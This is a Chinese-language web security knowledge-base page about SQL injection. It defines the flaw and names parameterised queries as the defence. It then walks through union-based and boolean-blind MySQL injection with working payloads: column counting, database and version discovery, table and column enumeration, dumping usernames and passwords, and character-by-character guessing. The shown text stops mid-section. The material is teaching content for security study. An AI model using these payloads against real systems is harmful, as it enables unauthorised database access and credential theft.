<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <title>SQL注入漏洞 | 狼组安全团队公开知识库</title>
    <meta name="description" content="">
    <meta name="generator" content="VuePress 1.7.1">
    <link rel="icon" href="/assets/logo.svg">
    <script type="text/javascript" src="/assets/js/push.js"></script>
    <meta name="description" content="致力于打造信息安全乌托邦">
    <meta name="referrer" content="never">
    <meta name="keywords" content="知识库,公开知识库,狼组,狼组安全团队知识库,knowledge">
    <link rel="preload" href="/assets/css/0.styles.32ca519c.css" as="style"><link rel="preload" href="/assets/js/app.f7464420.js" as="script"><link rel="preload" href="/assets/js/2.26207483.js" as="script"><link rel="preload" href="/assets/js/80.8d47d1f7.js" as="script"><link rel="prefetch" href="/assets/js/10.55514509.js"><link rel="prefetch" href="/assets/js/11.ec576042.js"><link rel="prefetch" href="/assets/js/12.a5584a2f.js"><link rel="prefetch" href="/assets/js/13.c9f84b2e.js"><link rel="prefetch" href="/assets/js/14.d2a5440c.js"><link rel="prefetch" href="/assets/js/15.2f271296.js"><link rel="prefetch" href="/assets/js/16.0895ce42.js"><link rel="prefetch" href="/assets/js/17.627e2976.js"><link rel="prefetch" href="/assets/js/18.73745a4c.js"><link rel="prefetch" href="/assets/js/19.19350186.js"><link rel="prefetch" href="/assets/js/20.e4eac589.js"><link rel="prefetch" href="/assets/js/21.fc0657ba.js"><link rel="prefetch" href="/assets/js/22.f4a1220f.js"><link rel="prefetch" href="/assets/js/23.c8cce92d.js"><link rel="prefetch" href="/assets/js/24.46225ec2.js"><link rel="prefetch" href="/assets/js/25.9b6d75e4.js"><link rel="prefetch" href="/assets/js/26.288f535e.js"><link rel="prefetch" href="/assets/js/27.865bdc75.js"><link rel="prefetch" href="/assets/js/28.f4224fef.js"><link rel="prefetch" href="/assets/js/29.6393a40b.js"><link rel="prefetch" href="/assets/js/3.a509f503.js"><link rel="prefetch" href="/assets/js/30.d5a49f97.js"><link rel="prefetch" href="/assets/js/31.eb3647df.js"><link rel="prefetch" href="/assets/js/32.7f48a571.js"><link rel="prefetch" href="/assets/js/33.1f374ffa.js"><link rel="prefetch" href="/assets/js/34.5a911179.js"><link rel="prefetch" href="/assets/js/35.d2bcc7ef.js"><link rel="prefetch" href="/assets/js/36.42e440bd.js"><link rel="prefetch" href="/assets/js/37.dedbbdea.js"><link rel="prefetch" href="/assets/js/38.d68d1f69.js"><link rel="prefetch" href="/assets/js/39.e278f860.js"><link rel="prefetch" href="/assets/js/4.35636da8.js"><link rel="prefetch" href="/assets/js/40.97f4e937.js"><link rel="prefetch" href="/assets/js/41.38630688.js"><link rel="prefetch" href="/assets/js/42.cae56aa5.js"><link rel="prefetch" href="/assets/js/43.61a04b16.js"><link rel="prefetch" href="/assets/js/44.5c6230f2.js"><link rel="prefetch" href="/assets/js/45.0f1355ae.js"><link rel="prefetch" href="/assets/js/46.c1906649.js"><link rel="prefetch" href="/assets/js/47.7ae220ce.js"><link rel="prefetch" href="/assets/js/48.59af224e.js"><link rel="prefetch" href="/assets/js/49.6a33a171.js"><link rel="prefetch" href="/assets/js/5.08ab40ee.js"><link rel="prefetch" href="/assets/js/50.f14601d2.js"><link rel="prefetch" href="/assets/js/51.f20841fd.js"><link rel="prefetch" href="/assets/js/52.fb0a5327.js"><link rel="prefetch" href="/assets/js/53.8013048c.js"><link rel="prefetch" href="/assets/js/54.d132c2f8.js"><link rel="prefetch" href="/assets/js/55.87aa8b5d.js"><link rel="prefetch" href="/assets/js/56.161f38ad.js"><link rel="prefetch" href="/assets/js/57.bd6a2ef2.js"><link rel="prefetch" href="/assets/js/58.8a69f15a.js"><link rel="prefetch" href="/assets/js/59.93c0e2de.js"><link rel="prefetch" href="/assets/js/6.fda5ce3a.js"><link rel="prefetch" href="/assets/js/60.10091d44.js"><link rel="prefetch" href="/assets/js/61.cd1e3b10.js"><link rel="prefetch" href="/assets/js/62.9c0ad8c5.js"><link rel="prefetch" href="/assets/js/63.4a8dd9d2.js"><link rel="prefetch" href="/assets/js/64.6bf3fede.js"><link rel="prefetch" href="/assets/js/65.7a2ccc50.js"><link rel="prefetch" href="/assets/js/66.874d563b.js"><link rel="prefetch" href="/assets/js/67.bb86eab2.js"><link rel="prefetch" href="/assets/js/68.c1db2a2b.js"><link rel="prefetch" href="/assets/js/69.8141480b.js"><link rel="prefetch" href="/assets/js/7.d1fe6bef.js"><link rel="prefetch" href="/assets/js/70.9fb74c80.js"><link rel="prefetch" href="/assets/js/71.d1e4e9ab.js"><link rel="prefetch" href="/assets/js/72.e6bf83fb.js"><link rel="prefetch" href="/assets/js/73.6dd6c980.js"><link rel="prefetch" href="/assets/js/74.3612ba47.js"><link rel="prefetch" href="/assets/js/75.6e1a2434.js"><link rel="prefetch" href="/assets/js/76.5bfa4bcc.js"><link rel="prefetch" href="/assets/js/77.784df031.js"><link rel="prefetch" href="/assets/js/78.aa94a0a0.js"><link rel="prefetch" href="/assets/js/79.c4e9a4f2.js"><link rel="prefetch" href="/assets/js/8.63fd05d7.js"><link rel="prefetch" href="/assets/js/81.1160b022.js"><link rel="prefetch" href="/assets/js/82.7d17e5c8.js"><link rel="prefetch" href="/assets/js/83.a2ff144a.js"><link rel="prefetch" href="/assets/js/84.53d29383.js"><link rel="prefetch" href="/assets/js/9.b49161a4.js">
    <link rel="stylesheet" href="/assets/css/0.styles.32ca519c.css">
  </head>
  <body>
    <div id="app" data-server-rendered="true"><div class="theme-container"><header class="navbar"><div class="ant-row"><div class="nav-button"><i aria-label="icon: bars" class="anticon anticon-bars"><svg viewBox="0 0 1024 1024" focusable="false" data-icon="bars" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M912 192H328c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h584c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zm0 284H328c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h584c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zm0 284H328c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h584c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zM104 228a56 56 0 1 0 112 0 56 56 0 1 0-112 0zm0 284a56 56 0 1 0 112 0 56 56 0 1 0-112 0zm0 284a56 56 0 1 0 112 0 56 56 0 1 0-112 0z"></path></svg></i> <span></span></div> <div class="ant-col ant-col-xs-24 ant-col-sm-24 ant-col-md-6 ant-col-lg-5 ant-col-xl-5 ant-col-xxl-4"><a href="/" class="router-link-active home-link"><img src="/assets/logo.svg" alt="狼组安全团队公开知识库" class="logo"> <span class="site-name">狼组安全团队公开知识库</span></a> <div class="search-box mobile-search"><input aria-label="Search" autocomplete="off" spellcheck="false" value=""> <!----></div></div> <div class="ant-col ant-col-xs-0 ant-col-sm-0 ant-col-md-18 ant-col-lg-19 ant-col-xl-19 ant-col-xxl-20"><div class="search-box"><input aria-label="Search" autocomplete="off" spellcheck="false" value=""> <!----></div> <nav class="nav-links can-hide"><ul role="menu" id="nav" class="ant-menu ant-menu-horizontal ant-menu-root ant-menu-light"><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/" class="router-link-active">
          首页
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/guide/">
          使用指南
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/knowledge/" class="router-link-active">
          知识库
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/opensource/">
          开源项目
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="visibility:hidden;position:absolute;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li></ul> <a href="https://github.com/wgpsec" target="_blank" rel="noopener noreferrer" class="repo-link"><i aria-label="icon: github" class="anticon anticon-github"><svg viewBox="64 64 896 896" focusable="false" data-icon="github" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M511.6 76.3C264.3 76.2 64 276.4 64 523.5 64 718.9 189.3 885 363.8 946c23.5 5.9 19.9-10.8 19.9-22.2v-77.5c-135.7 15.9-141.2-73.9-150.3-88.9C215 726 171.5 718 184.5 703c30.9-15.9 62.4 4 98.9 57.9 26.4 39.1 77.9 32.5 104 26 5.7-23.5 17.9-44.5 34.7-60.8-140.6-25.2-199.2-111-199.2-213 0-49.5 16.3-95 48.3-131.7-20.4-60.5 1.9-112.3 4.9-120 58.1-5.2 118.5 41.6 123.2 45.3 33-8.9 70.7-13.6 112.9-13.6 42.4 0 80.2 4.9 113.5 13.9 11.3-8.6 67.3-48.8 121.3-43.9 2.9 7.7 24.7 58.3 5.5 118 32.4 36.8 48.9 82.7 48.9 132.3 0 102.2-59 188.1-200 212.9a127.5 127.5 0 0 1 38.1 91v112.5c.8 9 0 17.9 15 17.9 177.1-59.7 304.6-227 304.6-424.1 0-247.2-200.4-447.3-447.5-447.3z"></path></svg></i></a></nav></div></div> <!----></header> <aside class="sidebar"><div><div class="promo"><div id="promo_3"><div class="promo_title">赞助商</div> <button type="button" class="ant-btn ant-btn-primary ant-btn-background-ghost"><span>成为赞助商</span></button></div></div> <div role="separator" id="reset-margin" class="ant-divider ant-divider-horizontal ant-divider-dashed"></div></div> <ul class="sidebar-links"><li><a href="/knowledge/" aria-current="page" title="知识库广告位招租" class="sidebar-link">知识库广告位招租</a></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>CTF</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>基础知识</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>工具手册</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading open"><span>Web安全</span> <span class="arrow down"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <ul class="sidebar-links sidebar-group-items"><li><a href="/knowledge/web/" aria-current="page" title="分类简介" class="sidebar-link">分类简介</a></li><li><a href="/knowledge/web/unauthorized.html" title="未授权访问总结" class="sidebar-link">未授权访问总结</a></li><li><a href="/knowledge/web/infoleak.html" title="信息泄露漏洞" class="sidebar-link">信息泄露漏洞</a></li><li><a href="/knowledge/web/fileuploads.html" title="文件上传漏洞" class="sidebar-link">文件上传漏洞</a></li><li><a href="/knowledge/web/fileincludes.html" title="文件包含漏洞" class="sidebar-link">文件包含漏洞</a></li><li><a href="/knowledge/web/cmd_injection.html" title="命令注入漏洞" class="sidebar-link">命令注入漏洞</a></li><li><a href="/knowledge/web/logical.html" title="常见逻辑漏洞" class="sidebar-link">常见逻辑漏洞</a></li><li><a href="/knowledge/web/csrf-ssrf.html" title="请求伪造漏洞" class="sidebar-link">请求伪造漏洞</a></li><li><a href="/knowledge/web/same-origin-policy.html" title="同源策略和域安全" class="sidebar-link">同源策略和域安全</a></li><li><a href="/knowledge/web/xss.html" title="XSS 跨站脚本漏洞" class="sidebar-link">XSS 跨站脚本漏洞</a></li><li><a href="/knowledge/web/xxe.html" title="XML实体注入漏洞" class="sidebar-link">XML实体注入漏洞</a></li><li><a href="/knowledge/web/sql_injection.html" aria-current="page" title="SQL注入漏洞" class="active sidebar-link">SQL注入漏洞</a></li><li><a href="/knowledge/web/mysql-write-shell.html" title="MySQL写shell" class="sidebar-link">MySQL写shell</a></li><li><a href="/knowledge/web/websocket-sec.html" title="WebSocket安全问题分析" class="sidebar-link">WebSocket安全问题分析</a></li></ul></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>攻防对抗</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>代码审计</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li></ul></aside> <main class="page"> <div class="theme-antdocs-content content__default"><h1 id="sql注入漏洞基本原理">SQL注入漏洞基本原理 <a href="#sql注入漏洞基本原理" class="header-anchor">#</a></h1> <p>Web应用程序对用户输入的数据校验处理不严或者根本没有校验，致使用户可以拼接执行SQL命令。</p> <p>可能导致数据泄露或数据破坏，缺乏可审计性，甚至导致完全接管主机。</p> <p><strong>根据注入技术分类有以下五种：</strong></p> <blockquote><p>布尔型盲注：根据返回页面判断条件真假</p> <p>时间型盲注：用页面返回时间是否增加判断是否存在注入</p> <p>基于错误的注入：页面会返回错误信息</p> <p>联合查询注入：可以使用union的情况下</p> <p>堆查询注入：可以同时执行多条语句</p></blockquote> <h2 id="防御方法">防御方法 <a href="#防御方法" class="header-anchor">#</a></h2> <p>使用参数化查询。</p> <p>数据库服务器不会把参数的内容当作<code>SQL</code>指令的一部分来拼接执行；</p> <p>而是在数据库完成<code>SQL</code>指令的编译后才套用参数运行(预编译)。</p> <p>避免数据变成代码被执行，时刻分清代码和数据的界限。</p> <h1 id="mysql基础知识">MySQL基础知识 <a href="#mysql基础知识" class="header-anchor">#</a></h1> <blockquote><p><strong>MySQL默认的数据库有</strong></p> <p>sys、mysql、performance_schema、information_schema；</p></blockquote> <p><strong>information_schema存放着所有的数据库信息(5.0版本以上才有这个库)</strong></p> <p>这个库有三个表：</p> <blockquote><ul><li><strong>SCHEMATA</strong>	该表存放用户创建的所有数据库库名
<ul><li><strong>SCHEMA_NAME 字段</strong>记录数据库库名</li></ul></li> <li><strong>TABLES</strong>     该表存放用户创建的所有数据库库名和表名
<ul><li><strong>TABLE_SCHEMA 字段</strong>记录数据库名</li> <li><strong>TABLE_NAME 字段</strong>记录表名</li></ul></li> <li><strong>COLUMNS</strong>     该表存放用户创建的所有数据库库名、表名和字段名
<ul><li><strong>TABLE_SCHEMA 字段</strong>记录数据库名</li> <li><strong>TABLE_NAME 字段</strong>记录表名</li> <li><strong>COLUMN_NAME 字段</strong>记录字段名</li></ul></li></ul></blockquote> <h1 id="查找sql注入漏洞">查找SQL注入漏洞 <a href="#查找sql注入漏洞" class="header-anchor">#</a></h1> <h2 id="union注入">Union注入 <a href="#union注入" class="header-anchor">#</a></h2> <p>以MySQL注入为例</p> <p><strong>1、在参数后添加引号尝试报错，并用<code>and 1=1#</code>和<code>and 1=2#</code>测试报错</strong></p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code>?id<span class="token operator">=</span><span class="token number">1</span><span class="token string">' and 1=1#		页面返回正常
?id=1'</span> <span class="token operator">and</span> <span class="token number">1</span><span class="token operator">=</span><span class="token number">2</span><span class="token comment">#		页面返回不正常</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p><strong>2、利用<code>order by</code>猜测字段</strong></p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code>?id<span class="token operator">=</span><span class="token number">1</span><span class="token operator">%</span><span class="token number">27</span><span class="token operator">%</span><span class="token number">20</span>order<span class="token operator">%</span><span class="token number">0</span>aby<span class="token operator">%</span><span class="token number">0</span>c2<span class="token operator">%</span><span class="token number">23</span>	<span class="token comment">--返回正常</span>
<span class="token comment">--上边用%0a和%0c的URL编码可以代替空格，到数据库后就是空格的意思</span>
?id<span class="token operator">=</span><span class="token number">1</span><span class="token operator">%</span><span class="token number">27</span> <span class="token keyword">order</span> <span class="token keyword">by</span> <span class="token number">3</span><span class="token comment">#			--返回正常</span>
?id<span class="token operator">=</span><span class="token number">1</span><span class="token operator">%</span><span class="token number">27</span> <span class="token keyword">order</span> <span class="token keyword">by</span> <span class="token number">4</span><span class="token comment">#			--返回正常</span>
?id<span class="token operator">=</span><span class="token number">1</span><span class="token operator">%</span><span class="token number">27</span> <span class="token keyword">order</span> <span class="token keyword">by</span> <span class="token number">5</span><span class="token comment">#			--返回错误</span>

<span class="token comment">--这就证明字段总数为4</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br></div></div><p><strong>3、利用union联合查询</strong></p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code>?id<span class="token operator">=</span><span class="token operator">-</span><span class="token number">1</span><span class="token operator">%</span><span class="token number">27</span> <span class="token keyword">union</span> <span class="token keyword">select</span> <span class="token number">1</span><span class="token punctuation">,</span><span class="token number">2</span><span class="token punctuation">,</span><span class="token number">3</span><span class="token punctuation">,</span><span class="token number">4</span><span class="token comment">#		--看哪个字段可以显示信息，利用它获取数据库信息</span>
<span class="token comment">--修改id为一个不存在的id，强行报错</span>
<span class="token comment">--因为代码默认只返回第一条结果，不会返回 union select 的结果</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><p><strong>4、获取数据库信息</strong></p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code>id<span class="token operator">=</span><span class="token operator">-</span><span class="token number">1</span><span class="token operator">%</span><span class="token number">27</span> <span class="token keyword">union</span> <span class="token keyword">select</span> <span class="token number">1</span><span class="token punctuation">,</span><span class="token number">2</span><span class="token punctuation">,</span><span class="token number">3</span><span class="token punctuation">,</span>CONCAT_WS<span class="token punctuation">(</span><span class="token keyword">CHAR</span><span class="token punctuation">(</span><span class="token number">32</span><span class="token punctuation">,</span><span class="token number">58</span><span class="token punctuation">,</span><span class="token number">32</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token keyword">user</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token keyword">database</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span>version<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token comment">#</span>

<span class="token keyword">user</span><span class="token punctuation">(</span><span class="token punctuation">)</span>		<span class="token comment">--获取数据库用户名</span>
<span class="token keyword">database</span><span class="token punctuation">(</span><span class="token punctuation">)</span>	<span class="token comment">--获取数据库名</span>
version<span class="token punctuation">(</span><span class="token punctuation">)</span>	<span class="token comment">--获取数据库版本信息</span>
concat_ws<span class="token punctuation">(</span>separator<span class="token punctuation">,</span>str1<span class="token punctuation">,</span>str2<span class="token punctuation">,</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">)</span>	<span class="token comment">--含有分隔符地连接字符串 </span>
<span class="token comment">--里边这的separator分隔符，用 char() 函数把 空格:空格 的ASCII码输出</span>

<span class="token comment">--其它信息</span>
@<span class="token variable">@datadir</span>				<span class="token comment">--数据库路径</span>
@<span class="token variable">@version_compile_os</span>	<span class="token comment">--操作系统版本</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br></div></div><p><strong>5、查询数据库的表</strong></p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code>id<span class="token operator">=</span><span class="token operator">-</span><span class="token number">1</span><span class="token operator">%</span><span class="token number">27</span> <span class="token keyword">union</span> <span class="token keyword">select</span> <span class="token number">1</span><span class="token punctuation">,</span><span class="token number">2</span><span class="token punctuation">,</span><span class="token number">3</span><span class="token punctuation">,</span>table_name <span class="token keyword">from</span> information_schema<span class="token punctuation">.</span><span class="token keyword">tables</span> <span class="token keyword">where</span> table_schema<span class="token operator">=</span><span class="token string">'sqli'</span> <span class="token keyword">limit</span> <span class="token number">0</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token comment">#</span>

<span class="token comment">--table_schema=数据库名16进制或者用单引号括起来</span>
<span class="token comment">--改变limit 0,1中前一个参数，得到所有表</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><p><strong>6、查询数据库字段</strong></p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code>id<span class="token operator">=</span><span class="token operator">-</span><span class="token number">1</span><span class="token operator">%</span><span class="token number">27</span> <span class="token keyword">union</span> <span class="token keyword">select</span> <span class="token number">1</span><span class="token punctuation">,</span><span class="token number">2</span><span class="token punctuation">,</span><span class="token number">3</span><span class="token punctuation">,</span>column_name <span class="token keyword">from</span> information_schema<span class="token punctuation">.</span><span class="token keyword">columns</span> <span class="token keyword">where</span> table_schema<span class="token operator">=</span><span class="token operator">%</span><span class="token number">27</span>数据库名<span class="token operator">%</span><span class="token number">27</span> <span class="token operator">and</span> table_name<span class="token operator">=</span><span class="token operator">%</span><span class="token number">27</span>表名<span class="token operator">%</span><span class="token number">27</span>limit <span class="token number">0</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token comment">#</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><strong>7、脱裤，获取数据</strong></p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code><span class="token keyword">union</span> <span class="token keyword">select</span> <span class="token number">1</span><span class="token punctuation">,</span><span class="token number">2</span><span class="token punctuation">,</span><span class="token number">3</span><span class="token punctuation">,</span>group_concat<span class="token punctuation">(</span>name<span class="token punctuation">,</span>password<span class="token punctuation">)</span><span class="token operator">%</span><span class="token number">20</span>from<span class="token operator">%</span><span class="token number">20</span>sc<span class="token comment">#</span>
<span class="token comment">--用字段名从表中取数据</span>
group_concat<span class="token punctuation">(</span>str1<span class="token punctuation">,</span>str2<span class="token punctuation">,</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">)</span>	<span class="token comment">--连接一个组的所有字符串</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><h2 id="boolean注入">Boolean注入 <a href="#boolean注入" class="header-anchor">#</a></h2> <p>布尔型盲注，页面不返回查询信息的数据，只能通过页面返回信息的真假条件判断是否存在注入。</p> <p><strong>1、在参数后添加引号尝试报错，并用<code>and 1=1#</code>和<code>and 1=2#</code>测试报错</strong></p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code>?id<span class="token operator">=</span><span class="token number">1</span><span class="token string">' and 1=1#		页面返回正常
?id=1'</span> <span class="token operator">and</span> <span class="token number">1</span><span class="token operator">=</span><span class="token number">2</span><span class="token comment">#		页面返回不正常</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p><strong>2、判断数据库名的长度</strong></p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code><span class="token number">1</span><span class="token string">'and length(database())&gt;=1--+		页面返回正常
1'</span><span class="token operator">and</span> length<span class="token punctuation">(</span><span class="token keyword">database</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token operator">&gt;=</span><span class="token number">13</span><span class="token comment">--+		页面返回正常</span>
<span class="token number">1</span>'<span class="token operator">and</span> length<span class="token punctuation">(</span><span class="token keyword">database</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token operator">&gt;=</span><span class="token number">14</span><span class="token comment">--+		页面返回错误</span>

由此判断得到数据库名的长度是<span class="token number">13</span>个字符
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><p><strong>3、猜解数据库名</strong></p> <p>使用逐字符判断的方式获取数据库名；</p> <p>数据库名的范围一般在a~z、0~9之内，可能还会有特殊字符 &quot;_&quot;、&quot;-&quot; 等，这里的字母不区分大小写。</p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code><span class="token string">' and substr(database(),1,1)='</span>a<span class="token string">'--+
'</span> <span class="token operator">and</span> substr<span class="token punctuation">(</span><span class="token keyword">database</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token number">2</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token operator">=</span><span class="token string">'a'</span><span class="token comment">--+</span>

substr 的用法和 <span class="token keyword">limit</span> 有区别，<span class="token keyword">limit</span>从 <span class="token number">0</span> 开始排序，这里从 <span class="token number">1</span> 开始排序。
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><p>用Burp爆破字母a的位置，即可得到数据库名每个位置上的字符。</p> <p><strong>还可以用ASCII码查询</strong></p> <p>a 的ASCII码是97，在MySQL中使用ord函数转换ASCII，所以逐字符判断语句可改为：</p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code>' <span class="token operator">and</span> ord<span class="token punctuation">(</span>substr<span class="token punctuation">(</span><span class="token keyword">database</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token operator">=</span><span class="token number">97</span><span class="token comment">--+</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>ASCII码表中可显示字符的范围是：0~127</p> <p><strong>4、判断数据库表名</strong></p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code><span class="token string">' and substr((select table_name from information_schema.tables where table_schema='</span>数据库名<span class="token string">' limit 0,1),1,1)='</span>a'<span class="token comment">--+</span>

<span class="token comment">--修改1,1前边的1~20，逐字符猜解出第一个表的名</span>
<span class="token comment">--修改limit的0,1前边的0~20，逐个猜解每个表</span>
